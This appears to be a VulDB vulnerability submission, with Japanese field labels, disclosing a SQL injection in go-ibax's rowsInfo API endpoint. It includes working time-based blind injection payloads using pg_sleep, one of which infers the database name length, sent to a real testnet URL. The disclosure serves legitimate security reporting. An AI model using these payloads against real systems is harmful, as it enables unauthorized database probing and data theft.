| タイトル | SQL injection vulnerability in go-ibax via where parameter |
|---|
| 説明 | SQL Injection vulnerability in /packages/api/database.go of go-ibax via where parameter .This issue affects versions starting from commits on Jul 18, 2020.
file:
https://github.com/IBAX-io/go-ibax/blob/6bac7462801b5e6da47f1231681bb1516a7dd4bb/packages/api/database.go#L189
commits:
https://github.com/IBAX-io/go-ibax/commit/ac760982dc31edc904c160c2e5707a28798646e2#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174
POC:
Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData: order=1&where=1=1%3b%3bselect+pg_sleep(10)%3b--&table_name=pg_user&limit=1&page=1
as you can see, when I use pg_sleep, the request is delayed 10s.
PostData:
order=1&where=1=1%3b%3bselect+case+when((select+length(current_database()))=4)+then+pg_sleep(5)+else+pg_sleep(0)+end%3b--&table_name=pg_user&limit=1&page=1
as you can see, when I use pg_sleep to judge the length of current_database , it shows 4. |
|---|
| ソース | ⚠️ https://github.com/IBAX-io/go-ibax/issues/2063 |
|---|
| ユーザー | Tomy (UID 34751) |
|---|
| 送信 | 2022年11月01日 12:42 (4 年 ago) |
|---|
| モデレーション | 2022年11月01日 16:45 (4 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 212638 [IBAX go-ibax /api/v2/open/rowsInfo where SQLインジェクション] |
|---|
| ポイント | 20 |
|---|